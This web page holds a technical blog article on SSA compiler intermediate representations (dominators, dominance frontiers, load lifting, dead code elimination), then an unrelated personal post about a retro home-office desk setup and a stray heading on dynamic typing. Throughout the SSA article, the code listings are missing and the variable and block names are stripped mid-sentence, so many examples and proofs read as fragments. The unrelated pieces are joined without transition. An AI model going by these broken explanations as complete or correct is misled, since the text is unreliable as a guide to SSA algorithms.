If you’ve read anything about compilers in the last two decades or so, you have almost certainly heard of SSA compilers , a popular architecture featured in many optimizing compilers, including ahead-of-time compilers such as LLVM, GCC, Go, CUDA (and various shader compilers), Swift 1 , and MSVC 2 , and just-in-time compilers such as HotSpot C2 3 , V8 4 , SpiderMonkey 5 , LuaJIT, and the Android Runtime 6 . SSA is hugely popular, to the point that most compiler projects no longer bother with other IRs for optimization 7 . This is because SSA is incredibly nimble at the types of program analysis and transformation that compiler optimizations want to do on your code. But why ? Many of my friends who don’t do compilers often say that compilers seem like opaque magical black boxes, and SSA, as it often appears in the literature, is impenetrably complex. But it’s not! SSA is actually very simple once you forget everything you think your programs are actually doing. We will develop the concept of SSA form, a simple SSA IR, prove facts about it, and design some optimizations on it. I have previously written about the granddaddy of all modern SSA compilers, LLVM. This article is about SSA in general, and won’t really have anything to do with LLVM. However, it may be helpful to read that article to make some of the things in this article feel more concrete. SSA is a property of intermediate representations (IRs), primarily used by compilers for optimizing imperative code that targets a register machine . Register machines are computers that feature a fixed set of registers that can be used as the operands for instructions: this includes virtually all physical processors, including CPUs, GPUs, and weird things like DSPs.
SSA is most frequently found in compiler middle-ends , the optimizing component between the frontend (which deals with the surface language programmers write, and lowers it into the middle-end’s IR), and the backend (which takes the optimized IR and lowers it into the target platform’s assembly). SSA IRs, however, often have little resemblance to the surface language they lower out of, or the assembly language they target. This is because neither of these representations make it easy for a compiler to intuit optimization opportunities. Imperative code consists of a sequence of operations that mutate the executing machine’s state to produce a desired result. For example, consider the following C program: This program returns no matter what its input is, so we can optimize it down to this: But, how would you write a general algorithm to detect that all of the operations cancel out? You’re forced to keep in mind program order to perform the necessary dataflow analysis, following mutations of and through the program. But this isn’t very general, and traversing all of those paths makes the search space for large functions very big. Instead, you would like to rewrite the program such that and gradually get replaced with the expression that calculates the most recent value, like this: Then we can replace each occurrence of a variable with its right-hand side recursively… Then fold the constants together… And finally, we see that we’re returning , and can replace it with . All the other variables are now unused, so we can delete them. The reason this works so well is because we took a function with mutation, and converted it into a combinatorial circuit , a type of digital logic circuit that has no state, and which is very easy to analyze. The dependencies between nodes in the circuit (corresponding to primitive operations such as addition or multiplication) are obvious from its structure. 
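The original code listings for this walkthrough did not survive extraction here, but a hypothetical stand-in for the kind of program described — every mutation ultimately cancels out, so the function is constant — might look like this, shown next to its single-assignment rewrite (both functions are my own illustration, not the article's listing):

```c
#include <assert.h>

// A function whose mutations all cancel: it returns 7 for any input.
int before(int x) {
    int y = x + 2;
    y = y - x;      // y is now always 2
    x = y * 3;      // x is now always 6
    return x + 1;   // always 7
}

// The rewrite described above: each mutation gets a fresh variable, so
// every name has exactly one defining expression we can substitute.
int after(int x0) {
    int y0 = x0 + 2;
    int y1 = y0 - x0;  // substitutes to (x0 + 2) - x0, folds to 2
    int x1 = y1 * 3;   // folds to 6
    return x1 + 1;     // folds to 7; y0, y1, x1 are now unused
}
```

With every variable defined exactly once, the recursive substitute-and-fold procedure from the text becomes purely mechanical.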
For example, consider the following circuit diagram for a one-bit multiplier: This graph representation of an operation program has two huge benefits: The powerful tools of graph theory can be used to algorithmically analyze the program and discover useful properties, such as operations that are independent of each other or whose results are never used. The operations are not ordered with respect to each other except when there is a dependency; this is useful for reordering operations, something compilers really like to do. The reason combinatorial circuits are the best circuits is because they are directed acyclic graphs (DAGs), which admit really nice algorithms. For example, longest path in a graph is NP-hard (and, because P ≠ NP 8 , has complexity O(2^n)). However, if the graph is a DAG, it admits an O(n) solution! To understand this benefit, consider another program: Suppose we wanted to replace each variable with its definition like we did before. We can’t just replace each constant variable with the expression that defines it though, because we would wind up with a different program! Now, we pick up an extra term because the squaring operation is no longer unused! We can put this into circuit form, but it requires inserting new variables for every mutation. But we can’t do this when complex control flow is involved! So all of our algorithms need to carefully account for mutations and program order, meaning that we don’t get to use the nice graph algorithms without careful modification. SSA stands for “static single assignment”, and was developed in the 80s as a way to enhance the existing three-address code (where every statement is in the form ) so that every program was circuit-like, using a very similar procedure to the one described above. The SSA invariant states that every variable in the program is assigned to by precisely one operation.
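The claim above that longest path becomes linear-time on a DAG can be made concrete: visit nodes in topological order and relax each edge exactly once. A small sketch of my own (not from the article), counting path length in edges:

```c
#include <assert.h>

#define MAXV 16

// Longest path (in edges) of a DAG in O(V + E) using Kahn's algorithm:
// adj[u] lists u's successors, deg[u] says how many there are.
int dag_longest_path(int n, int adj[MAXV][MAXV], int deg[MAXV]) {
    int indeg[MAXV] = {0}, dist[MAXV] = {0};
    int queue[MAXV], qhead = 0, qtail = 0, best = 0;

    for (int u = 0; u < n; u++)
        for (int k = 0; k < deg[u]; k++) indeg[adj[u][k]]++;
    for (int u = 0; u < n; u++)
        if (indeg[u] == 0) queue[qtail++] = u;   // roots seed the order

    while (qhead < qtail) {
        int u = queue[qhead++];
        if (dist[u] > best) best = dist[u];
        for (int k = 0; k < deg[u]; k++) {
            int v = adj[u][k];
            if (dist[u] + 1 > dist[v]) dist[v] = dist[u] + 1;
            if (--indeg[v] == 0) queue[qtail++] = v;  // v's deps are done
        }
    }
    return best;  // only meaningful if the input really is acyclic
}
```

The same topological-order trick underlies many SSA analyses: once the graph is a DAG, one pass in dependency order suffices.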
If every operation in the program is visited once, they form a combinatorial circuit. Transformations are required to respect this invariant. In circuit form, a program is a graph where operations are nodes, and “registers” (which is what variables are usually called in SSA) are edges (specifically, each output of an operation corresponds to a register). But, again, control flow. We can’t hope to circuitize a loop, right? The key observation of SSA is that most parts of a program are circuit-like. A basic block is a maximal circuital component of a program. Simply put, it is a sequence of non-control flow operations, and a final terminator operation that transfers control to another basic block. The basic blocks themselves form a graph, the control flow graph , or CFG. This formulation of SSA is sometimes called SSA-CFG 9 . This graph is not a DAG in general; however, separating the program into basic blocks conveniently factors out the “non-DAG” parts of the program, allowing for simpler analysis within basic blocks. There are two equivalent formalisms for SSA-CFG. The traditional one uses special “phi” operations (often called phi nodes , which is what I will call them here) to link registers across basic blocks. This is the formalism LLVM uses. A more modern approach, used by MLIR, is block arguments : each basic block specifies parameters, like a function, and blocks transferring control flow to it must pass arguments of those types to it. Let’s look at some code. First, consider the following C function which calculates Fibonacci numbers using a loop. How might we express this in an SSA-CFG IR? Let’s start inventing our SSA IR! It will look a little bit like LLVM IR, since that’s what I’m used to looking at. Every block ends in a , which transfers control to one of several possible blocks. In the process, it calls that block with the given arguments. One can think of a basic block as a tiny function which tails 10 into other basic blocks in the same function. 
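The "basic blocks are tiny functions that tail into each other" picture can be made literal in plain C. Here is my own illustrative sketch of the Fibonacci example (not the article's IR): function parameters play the role of block arguments, and each tail call is a branch passing arguments to the target block.

```c
#include <assert.h>

static int block_exit(int a) {
    return a;                               // the return terminator
}

static int block_loop(int i, int n, int a, int b) {
    if (i >= n) return block_exit(a);       // branch to exit(a)
    return block_loop(i + 1, n, b, a + b);  // branch back to loop(...)
}

int fib(int n) {
    return block_loop(0, n, 0, 1);          // entry block branches to loop
}
```

Notice that there is no mutation anywhere: the loop-carried state (i, a, b) is threaded through block arguments, which is exactly what the SSA invariant demands.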
aside Phi Nodes LLVM IR is… older, so it uses the older formalism of phi nodes. “Phi” comes from “phony”, because it is an operation that doesn’t do anything; it just links registers from predecessors. A operation is essentially a switch-case on the predecessors, each case selecting a register from that predecessor (or an immediate). For example, has two predecessors, the implicit entry block , and . In a phi node IR, instead of taking a block argument for , it would specify The value of the operation is the value from whichever block jumped to this one. This can be awkward to type out by hand and read, but is a more convenient representation for describing algorithms (just “add a phi node” instead of “add a parameter and a corresponding argument”) and for the in-memory representation, but is otherwise completely equivalent. It’s a bit easier to understand the transformation from C to our IR if we first rewrite the C to use goto instead of a for loop: However, we still have mutation in the picture, so this isn’t SSA. To get into SSA, we need to replace every assignment with a new register, and somehow insert block arguments… The above IR code is already partially optimized; the named variables in the C program have been lifted out of memory and into registers. If we represent each named variable in our C program with a pointer, we can avoid needing to put the program into SSA form immediately. This technique is used by frontends that lower into LLVM, like Clang. We’ll enhance our IR by adding a declaration for functions, which defines scratch space on the stack for the function to use. Each stack slot produces a pointer that we can from and to. Our Fibonacci function would now look like so: Any time we reference a named variable, we load from its stack slot, and any time we assign it, we store to that slot. This is very easy to get into from C, but the code sucks because it’s doing lots of unnecessary pointer operations. 
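The "memory form" a Clang-style frontend emits can also be mimicked in C: every named variable lives in a stack slot, touched only through explicit loads and stores. A hypothetical rendering of the idea (my own sketch, not the article's listing):

```c
#include <assert.h>

// Fibonacci in "memory form": each variable is a stack slot, read with
// *p (a load) and written with *p = ... (a store), mirroring the
// stack-slot IR before mem2reg-style optimization lifts it to registers.
int fib_mem(int n) {
    int i_slot, a_slot, b_slot;           // the scratch stack slots
    int *i = &i_slot, *a = &a_slot, *b = &b_slot;

    *i = 0; *a = 0; *b = 1;               // initial stores
    while (*i < n) {                      // load i, compare with n
        int t = *a + *b;                  // two loads feeding an add
        *a = *b;                          // load b, store a
        *b = t;                           // store b
        *i = *i + 1;                      // load, increment, store
    }
    return *a;                            // final load
}
```

Every assignment in the original C maps to a store and every use to a load, which is why this form is so easy to emit and so wasteful to execute.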
How do we get from this to the register-only function I showed earlier? aside Program Order We want program order to not matter for the purposes of reordering, but as we’ve written code here, program order does matter: loads depend on prior stores, but stores don’t produce a value that can be used to link the two operations. We can eliminate this dependence on program order by introducing operands representing an “address space”; loads and stores take an address space as an argument, and stores return a new address space. An address space, or , represents the state of some region of memory. Loads and stores are independent when they are not connected by a argument. This type of enhancement is used by Go’s SSA IR, for example. However, it adds a layer of complexity to the examples, so instead I will hand-wave this away. Now we need to prove some properties about CFGs that are important for the definition and correctness of our optimization passes. First, some definitions. The predecessors (or “preds”) of a basic block are the set of blocks with an outgoing edge to that block. A block may be its own predecessor. Some literature calls the above “direct” or immediate predecessors. For example, the preds of in our example are (the special name for the function entry-point) and . The successors (no, not “succs”) of a basic block are the set of blocks with an outgoing edge from that block. A block may be its own successor. The successors of are and . The successors are listed in the loop’s . If a block is a transitive pred of a block , we say that weakly dominates , or that it is a weak dominator of . For example, , and both weakly dominate . However, this is not usually an especially useful relationship. Instead, we want to speak of dominators: A block is a dominator (or dominates ) if every pred of is dominated by , or if is itself. Equivalently, the dominator set of is the intersection of the dominator sets of its preds, plus .
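Since the IR stores only successor edges (in each block's terminator), pred sets are computed by inverting that map; a quick sketch:

```python
def preds(cfg):
    """Invert a successor map {block: [succs]} into {block: set of preds}."""
    p = {b: set() for b in cfg}
    for b, succs in cfg.items():
        for s in succs:
            p[s].add(b)
    return p

# The loop example: the header is reached from the entry and the back edge.
cfg = {"entry": ["loop.start"], "loop.start": ["loop.body", "exit"],
       "loop.body": ["loop.start"], "exit": []}
assert preds(cfg)["loop.start"] == {"entry", "loop.body"}
```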
The dominance relation has some nice order properties that are necessary for defining the core graph algorithms of SSA. We only consider CFGs which are flowgraphs, that is, all blocks are reachable from the root block , which has no preds. This is necessary to eliminate some pathological graphs from our proofs. Importantly, we can always ask for an acyclic path 11 from to any block . An equivalent way to state the dominance relationship is that every path from to contains all of ’s dominators. proposition dominates iff every path from to contains . First, assume every to path contains . If is , we’re done. Otherwise we need to prove each predecessor of is dominated by ; we do this by induction on the length of acyclic paths from to . Consider preds of that are not , and consider all acyclic paths p from to ; by appending to them, we have an acyclic path p′ from to , which must contain . Because both the last and second-to-last elements of this path are not , it must be within the path p, which is shorter than p′. Thus, by induction, dominates , and therefore . Going the other way, if dominates , consider a path p from to . The second-to-last element of p is a pred of ; if it is we are done. Otherwise, we can consider the path p′ made by deleting at the end. is dominated by , and p′ is shorter than p, so we can proceed by induction as above. Onto those nice properties. Dominance allows us to take an arbitrarily complicated CFG and extract from it a DAG, composed of blocks ordered by dominance. The dominance relation is a partial order. Dominance is reflexive and transitive by definition, so we only need to show blocks can’t dominate each other. Suppose distinct and dominate each other. Pick an acyclic path p from to . Because dominates , there is a prefix p′ of this path ending in . But because dominates , some prefix p′′ of p′ ends in .
But now p must contain twice, contradicting that it is acyclic. This allows us to write when dominates . There is an even more refined graph structure that we can build out of dominators, which follows immediately from the partial order theorem. The dominators of a basic block are totally ordered by the dominance relation. Suppose and , but neither dominates the other. Then, there must exist acyclic paths from to which contain both, but in different orders. Take the subpaths of those paths which follow , and , neither of which contains . Concatenating these paths yields a path from to that does not contain , a contradiction. This tells us that the DAG we get from the dominance relation is actually a tree, rooted at . The parent of a node in this tree is called its immediate dominator . Computing dominators can be done iteratively: the dominator set of a block is the intersection of the dominator sets of its preds, plus . This algorithm runs in quadratic time. A better algorithm is the Lengauer-Tarjan algorithm. It is relatively simple, but explaining how to implement it is a bit out of scope for this article. I found a nice treatment of it here . What’s important is we can compute the dominator tree without breaking the bank, and given any node, we can ask for its immediate dominator. Using immediate dominators, we can introduce the final, important property of dominators. The dominance frontier of a block is the set of all blocks not dominated by with at least one pred which dominates. These are points where control flow merges from distinct paths: one containing and one not. The dominance frontier of is , whose preds are and . There are many ways to calculate dominance frontiers, but with a dominance tree in hand, we can do it like this: algorithm Dominance Frontiers. For each block with more than one pred, for each of its preds, let be that pred. Add to the dominance frontier of and all of its dominators, stopping when encountering ’s immediate dominator.
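Both the quadratic iterative dominator computation and the frontier algorithm just described are short enough to sketch directly. This is a simplified illustration (block names are mine, and a production compiler would use Lengauer-Tarjan for the tree):

```python
def dominance(cfg, root):
    """Dominator sets, immediate dominators, and dominance frontiers,
    via the quadratic algorithms described in the text."""
    preds = {b: set() for b in cfg}
    for b, ss in cfg.items():
        for s in ss:
            preds[s].add(b)

    # dom(b) = {b} union intersection of dom(p) over preds p, iterated to
    # a fixed point. (Flowgraphs: every non-root block has at least one pred.)
    dom = {b: set(cfg) for b in cfg}
    dom[root] = {root}
    changed = True
    while changed:
        changed = False
        for b in cfg:
            if b == root:
                continue
            new = {b} | set.intersection(*(dom[p] for p in preds[b]))
            if new != dom[b]:
                dom[b], changed = new, True

    # idom(b) is the strict dominator whose own dominator set is exactly
    # b's strict dominators; the total order makes it unique.
    idom = {}
    for b in cfg:
        strict = dom[b] - {b}
        for d in strict:
            if dom[d] == strict:
                idom[b] = d

    # Frontiers: for each join point, walk up the dominator tree from each
    # pred, adding the join, until reaching the join's immediate dominator.
    df = {b: set() for b in cfg}
    for b in cfg:
        if len(preds[b]) < 2:
            continue
        for p in preds[b]:
            runner = p
            while runner != idom[b]:
                df[runner].add(b)
                runner = idom[runner]
    return dom, idom, df

cfg = {"entry": ["loop.start"], "loop.start": ["loop.body", "exit"],
       "loop.body": ["loop.start"], "exit": []}
dom, idom, df = dominance(cfg, "entry")
assert idom["loop.body"] == "loop.start"
assert df["loop.body"] == {"loop.start"}   # the loop header is a join point
```

Note that the loop header even lands in its own frontier, thanks to the back edge.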
We need to prove that every block examined by the algorithm winds up in the correct frontiers. First, we check that every examined block is added to the correct frontier. If , where is a pred of , and a is ’s immediate dominator, then if , is not in its frontier, because must dominate . Otherwise, must be in ’s frontier, because dominates a pred but it cannot dominate , because then it would be dominated by , a contradiction. Second, we check that every frontier is complete. Consider a block . If an examined block is in its frontier, then must be among the dominators of some pred , and it must be dominated by ’s immediate dominator; otherwise, would dominate (and thus would not be in its frontier). Thus, gets added to ’s frontier. You might notice that all of these algorithms are quadratic. This is actually a very good time complexity for a compilers-related graph algorithm. Cubic and quartic algorithms are not especially uncommon, and yes, your optimizing compiler’s time complexity is probably cubic or quartic in the size of the program! Ok. Let’s construct an optimization. We want to figure out if we can replace a load from a pointer with the most recent store to that pointer. This will allow us to fully lift values out of memory by cancelling out store/load pairs. This will make use of yet another implicit graph data structure. The dataflow graph is the directed graph made up of the internal circuit graphs of each basic block, connected along block arguments. To follow a use-def chain is to walk this graph forward from an operation to discover operations that potentially depend on it, or backwards to find operations it potentially depends on. It’s important to remember that the dataflow graph, like the CFG, does not have a well defined “up” direction. Navigating it and the CFG requires the dominator tree. One other important thing to remember here is that every instruction in a basic block always executes if the block executes.
In much of this analysis, we need to appeal to “program order” to select the last load in a block, but we are always able to do so. This is an important property of basic blocks that makes them essential for constructing optimizations. For a given , we want to identify all loads that depend on it. We can follow the use-def chain of to find which blocks contain loads that potentially depend on the store (call it ). First, we can eliminate loads within the same basic block (call it ). Replace all instructions after (but before any other s, in program order) with ’s def. If is not the last store in this block, we’re done. Otherwise, follow the use-def chain of to successors which use , i.e., successors whose case has as at least one argument. Recurse into those successors, now replacing the pointer of interest with the parameters of the successor which were set to (more than one argument may be ). If a successor loads from one of the registers holding , replace all such loads before a store to . We also now need to send into somehow. This is where we run into something of a wrinkle. If has exactly one predecessor, we need to add a new block argument to pass whichever register is holding (which exists by induction). If is already passed into by another argument, we can use that one. However, if has multiple predecessors, we need to make sure that every path from to sends , and canonicalizing those will be tricky. Worse still, if is in ’s dominance frontier, a different store could be contributing to that load! For this reason, dataflow from stores to loads is not a great strategy. Instead, we’ll look at dataflow from loads backwards to stores (in general, dataflow from uses to defs tends to be more useful), which we can use to augment the above forward dataflow analysis to remove the complex issues around dominance frontiers. Let’s analyze loads instead. For each in , we want to determine all stores that could potentially contribute to its value.
We can find those stores as follows: We want to be able to determine which register in a given block corresponds to the value of , and then find its last store in that block. To do this, we’ll flood-fill the CFG backwards in BFS order. This means that we’ll follow preds (through the use-def chain) recursively, visiting each pred before visiting their preds, and never revisiting a basic block (except we may need to come back to at the end). Determining the “equivalent” 12 of in (we’ll call it ) can be done recursively: while examining , follow the def of . If is a block parameter, for each pred , set to the corresponding argument in the case in ’s . Using this information, we can collect all stores that the load potentially depends on. If a predecessor stores to , we add the last such store in (in program order) to our set of stores, and do not recurse to ’s preds (because this store overwrites all past stores). Note that we may revisit in this process, and collect a store to from it if one occurs in the block. This is necessary in the case of loops. The result is a set of pairs. In the process, we also collected a set of all blocks visited, , which are dominators of which we need to plumb a through. This process is called memory dependency analysis , and is a key component of many optimizations. Not all contributing operations are stores. Some may be references to globals (which we’re disregarding), or function arguments or the results of a function call (which means we probably can’t lift this load). For example, if gets traced all the way back to a function argument, there is a code path which loads from a pointer whose stores we can’t see. It may also trace back to a stack slot that is potentially not stored to. This means there is a code path that can potentially load uninitialized memory. Like LLVM, we can assume this is not observable behavior, so we can discount such dependencies.
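Here is a highly simplified sketch of that backward flood-fill. To keep it short, I hand-wave the register-equivalence renaming away (the pointer has one global name) and model each block as a program-ordered list of ("load"/"store", ptr) ops; the helper names are mine:

```python
from collections import deque

def reaching_stores(blocks, preds, block, load_index, ptr):
    """Collect the (block, op_index) stores that may reach a given load,
    by BFS backwards over preds, stopping at the last store in a block."""
    def last_store(b, before=None):
        ops = blocks[b] if before is None else blocks[b][:before]
        for i in range(len(ops) - 1, -1, -1):
            if ops[i] == ("store", ptr):
                return (b, i)
        return None

    # A store earlier in the load's own block shadows everything else.
    s = last_store(block, load_index)
    if s:
        return {s}

    found, visited = set(), set()
    queue = deque(preds[block])
    while queue:
        b = queue.popleft()
        if b in visited:
            continue
        visited.add(b)
        s = last_store(b)
        if s:
            found.add(s)            # this store overwrites all older ones
        else:
            queue.extend(preds[b])  # no store here: keep walking backwards
    return found

# A loop: the load at the top of "loop" sees the store in "entry" on the
# first iteration, and the store later in "loop" itself on every other one.
blocks = {"entry": [("store", "x")], "loop": [("load", "x"), ("store", "x")]}
preds = {"entry": [], "loop": ["entry", "loop"]}
assert reaching_stores(blocks, preds, "loop", 0, "x") == {("entry", 0), ("loop", 1)}
```

The re-visit of the load's own block via the back edge is exactly the loop case called out above.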
If all of the dependencies are uninitialized loads, we can potentially delete not just the load, but operations which depend on it (reverse dataflow analysis is the origin of so-called “time-traveling” UB). Now that we have the full set of dependency information, we can start lifting loads. Loads can be safely lifted when all of their dependencies are stores in the current function, or dependencies we can disregard thanks to UB in the surface language (such as loads or uninitialized loads). There is a lot of fuss in this algorithm about plumbing values through block arguments. A lot of IRs make a simplifying change, where every block implicitly receives the registers from its dominators as block arguments. I am keeping the fuss because it makes it clearer what’s going on, but in practice, most of this plumbing, except at dominance frontiers, would be happening in the background. Suppose we can safely lift some load. Now we need to plumb the stored values down to the load. For each block in (all other blocks will now be in unless stated otherwise), we will be building two mappings: one , which is the register equivalent to in that block, and one , which is the value that must have in that block. Prepare a work queue, with each in it initially. Then, until the queue is empty:

1. Pop a block from the queue.
2. For each successor (in ):
   - If isn’t already defined, add it as a block argument. Have pass to that argument.
   - If hasn’t been visited yet, and isn’t the block containing the load we’re deleting, add it to the queue.

Once we’re done, if is the block that contains the load, we can now replace all loads to before any stores to with . There are cases where this whole process can be skipped, by applying a “peephole” optimization. For example, stores followed by loads within the same basic block can be optimized away locally, leaving the heavy-weight analysis for cross-block store/load pairs. Here’s the result of doing dependency analysis on our Fibonacci function.
Each load is annotated with the blocks and stores in . Let’s look at . Its contributing stores are in and . So we add a new parameter : in , we call that parameter with (since that’s stored to it in ), while in , we pass . What about L4? The contributing stores are also in and , but one of those isn’t a pred of . is also in the subgraph for this load, though. So, starting from , we add a new parameter to and feed (the stored value, an immediate this time) through it. Now looking at , we see there is already a parameter for this load ( ), so we just pass as that argument. Now we process , which was pushed onto the queue. gets a new parameter , which is fed ’s own . We do not re-process , even though it also appears in ’s gotos, because we already visited it. After doing this for the other two loads, we get this: After lifting, if we know that a stack slot’s pointer does not escape (i.e., none of its uses wind up going into a function call 13 ) or a write to a global (or a pointer that escapes), we can delete every store to that pointer. If we delete every store to a stack slot, we can delete the stack slot altogether (there should be no loads left for that stack slot at this point). This analysis is simple, because it assumes pointers do not alias in general. Alias analysis is necessary for more accurate dependency analysis. This is necessary, for example, for lifting loads of fields of structs through subobject pointers, and dealing with pointer arithmetic in general. However, our dependency analysis is robust to passing different pointers as arguments to the same block from different predecessors. This is the case that is specifically handled by all of the fussing about with dominance frontiers. This robustness ultimately comes from SSA’s circuital nature. Similarly, this analysis needs to be tweaked to deal with something like (a ternary, essentially).
s of pointers need to be replaced with s of the loaded values, which means we need to do the lifting transformation “all at once”: lifting some liftable loads will leave the IR in an inconsistent state, until all of them have been lifted. Many optimizations will make a mess of the CFG, so it’s useful to have simple passes that “clean up” the mess left by transformations. Here are some easy examples. If an operation’s result has zero uses, and the operation has no side-effects, it can be deleted. This allows us to then delete operations that it depended on that now have no uses. Doing this is very simple, due to the circuital nature of SSA: collect all instructions whose outputs have zero uses, and delete them. Then, examine the defs of their operands; if those operations now have no uses, delete them, and recurse. This bubbles up all the way to block arguments. Deleting block arguments is a bit trickier, but we can use a work queue to do it. Put all of the blocks into a work queue. Then:

1. Pop a block from the queue. Run unused result elimination on its operations.
2. If it now has parameters with no uses, remove those parameters. For each pred, delete the corresponding arguments to this block. Then place those preds into the work queue (since some of their operations may have lost their last use).
3. If there is still work left, go to 1.

There are many CFG configurations that are redundant and can be simplified to reduce the number of basic blocks. For example, unreachable code can help delete blocks. Other optimizations may cause the at the end of a function to be empty (because all of its successors were optimized away). We treat an empty as being unreachable (since it has no cases!), so we can delete every operation in the block up to the last non-pure operation. If we delete every instruction in the block, we can delete the block entirely, and delete it from its preds’ s.
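The unused-result pass can be sketched as a worklist over a def-use map. This is an illustration with made-up structure (a register maps to the registers its defining op reads, plus a set of ops that must stay for their side effects):

```python
def eliminate_unused(defs, side_effecting):
    """Delete pure ops whose results have zero uses, then recurse into
    their operands, as described above. `defs`: result -> operands read."""
    uses = {r: 0 for r in defs}
    for operands in defs.values():
        for o in operands:
            if o in uses:
                uses[o] += 1

    dead = [r for r in defs if uses[r] == 0 and r not in side_effecting]
    while dead:
        r = dead.pop()
        for o in defs.pop(r):       # delete r; its operands each lose a use
            if o in uses:
                uses[o] -= 1
                if uses[o] == 0 and o in defs and o not in side_effecting:
                    dead.append(o)
    return defs

# c is unused and pure, so it dies; that kills b too; d (a store, say)
# has side effects and keeps a alive.
defs = {"a": [], "b": ["a"], "c": ["b"], "d": ["a"]}
left = eliminate_unused(defs, side_effecting={"d"})
assert set(left) == {"a", "d"}
```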
This is a form of dead code elimination , or DCE, which combines with the previous optimization to aggressively delete redundant code. Some jumps are redundant. For example, if a block has exactly one pred and one successor, the pred’s case for that block can be wired directly to the successor. Similarly, if two blocks are each other’s unique predecessor/successor, they can be fused , creating a single block by connecting the input blocks’ circuits directly, instead of through a . If we have a ternary operation, we can do more sophisticated fusion. If a block has two successors, both of which have the same unique successor, and those successors consist only of gotos, we can fuse all four blocks, replacing the CFG diamond with a . In terms of C, this is this transformation: LLVM’s CFG simplification pass is very sophisticated and can eliminate complex forms of control flow. I am hoping to write more about SSA optimization passes. This is a very rich subject, and viewing optimizations in isolation is a great way to understand how a sophisticated optimization pipeline is built out of simple, dumb components. It’s also a practical application of graph theory that shows just how powerful it can be, and (at least in my opinion) is an intuitive setting for understanding graph theory, which can feel very abstract otherwise. In the future, I’d like to cover CSE/GVN, loop optimizations, and, if I’m feeling brave, getting out of SSA into a finite-register machine (backends are not my strong suit!). Specifically the Swift frontend before lowering into LLVM IR.  ↩ Microsoft Visual C++, a non-conforming C++ compiler sold by Microsoft  ↩ HotSpot is the JVM implementation provided by OpenJDK; C2 is the “second compiler”, which has the best performance among HotSpot’s Java execution engines.  ↩ V8 is Chromium’s JavaScript runtime.  ↩ SpiderMonkey is Firefox’s JavaScript runtime.  ↩ The Android Runtime (ART) is the “JVM” (scare quotes) on the Android platform.  
↩ The Glasgow Haskell Compiler (GHC) does not use SSA; it (like some other pure-functional languages) uses a continuation-oriented IR (compare to Scheme’s ).  ↩ Every compiler person firmly believes that P ≠ NP, because program optimization is full of NP-hard problems and we would have definitely found polynomial ideal register allocation by now if it existed.  ↩ Some more recent IRs use a different version of SSA called “structured control flow”, or SCF. Wasm is a notable example of an SCF IR. SSA-SCF is equivalent to SSA-CFG, and polynomial time algorithms exist for losslessly converting between them (LLVM compiling Wasm, for example, converts its CFG into SCF using a “relooping algorithm”). In SCF, operations like switch statements and loops are represented as macro operations that contain basic blocks. For example, a operation might take a value as input, select a basic block to execute based on that, and return the value that basic block evaluates to as its output. RVSDG is a notable innovation in this space, because it allows circuit analysis of entire imperative programs. I am covering SSA-CFG instead of SSA-SCF simply because it’s more common, and because it’s what LLVM IR is. See also this MLIR presentation for converting between the two.  ↩ Tail calling is when a function call is the last operation in a function; this allows the caller to jump directly to the callee, recycling its own stack frame for it instead of requiring it to allocate its own.  
In the case of a global , assuming no data races, we would instead need alias information to tell if stores to this global within the current function (a) exist and (b) are liftable at all. If the equivalent is , we can proceed in one of two ways depending on optimization level. If we want loads of to trap (as in Go), we need to mark this load as not being liftable, because it may trap. If we want loads of to be UB, we simply ignore that pred, because we can assume (for our analysis) that if the pointer is , it is never loaded from.  ↩ Returned stack pointers do not escape: stack slots’ lifetimes end at function exit, so we return a dangling pointer, which we assume are never loaded. So stores to that pointer before returning it can be discarded.  ↩

Brain Baking 1 month ago

My (Retro) Desk Setup in 2025

A lot has happened since the desk setup post from March 2024 —that being I got kicked out of my usual cosy home office upstairs as it was being rebranded into our son’s bedroom. We’ve been trying to fit the office space into the rest of the house by exploring different alternatives: clear a corner of our bedroom and shove everything in there, cut down on stuff and integrate it into the living room, … None of the options felt particularly appealing to me. I grew attached to the upstairs place and didn’t want to lose the skylight. And then we renovated our home, resulting in more shuffling around of room designations: the living room migrated to the new section with high glass windows to better connect with the back garden. That logically meant I could claim the vacant living room space. Which I did: My home office setup since May 2025. Compared to the old setup, quite a few things changed. First, it’s clear that the new space is much more roomy. But that doesn’t automatically mean I’m able to fit more stuff into it. After comparing both setups, you’ll probably wonder where most of my retro hardware went off to: only the 486 made it into the corner on the left. I first experimented with replicating the same setup downstairs, resulting in a very long desk shoved under the window containing the PC towers and screens. That worked, as again there’s enough space, but at the same time, it didn’t at all: putting a lot of stuff in front of the window not only blocks the view, it also makes the office feel cramped and cluttered. That is why the desk is now split into two. The WinXP and Win98 machines have been temporarily stashed away in a closet as I still have to find a way to fit the third desk somewhere at the back (not pictured). Currently, a stray cupboard from the old living room is refusing to let go. We have some ideas to better organize the space, but at the moment I can’t find the energy to make it happen. I haven’t even properly reconnected the 486 tower.
The messy cables on the photo have been neatly tucked away by now, at least that’s something. Next, since I also have more wall space, I moved all board games into a new Kallax in the new space (pictured on the left). There’s still ample space left to welcome new board games, which was becoming a big problem in the old shelf in the hallway that now holds the games of the kids. On the opposite side of the wall (not pictured), I’ve mounted the Billy bookcases from upstairs that now bleed into the back wall (pictured on the right). These two components are new: the small one is currently holding Switch games and audio CDs and the one on the far right is still mostly empty except for fountain pen ink on the top shelf. The problem with filling all that wall space is that there’s almost none left to decorate with a piece of art. Fortunately, the Monkey Island posters survived the move, but I was hoping to be able to put up something else. The big window doesn’t help here: the old space’s skylight allowed me to optimize the wall space. The window is both a blessing and a curse. Admittedly, it’s very nice to be able to stare outside in-between the blue screen sessions, especially if it’s spring/summer when everything is bright green. The new space is far from finished. I intend to put a table down there next to the board game shelf so that noisy gaming sessions don’t bother the people in the living room. The retro hardware pieces deserve a permanent spot and I’m bummed out that some of them had to be (hopefully temporarily) stowed away. A KVM switch won’t help here as I already optimized the monitor usage (see the setup of previous years ). My wife suggested throwing a TV in there to connect the SNES and GameCube, but the books are eating up all the wall space and I don’t want the office to degrade into a cluttered mess. I’m not even sure whether the metre-long desk is worth it for just a laptop and a second screen compared to the one I used before.
The relax chair now used for nightly baby feeds still needs to find its way back here as well. I imagine that in a year things will look different yet again. Hopefully, by then, it will feature more retroness . Related topics: / setup / By Wouter Groeneveld on 12 October 2025.  Reply via email .


What Dynamic Typing Is For

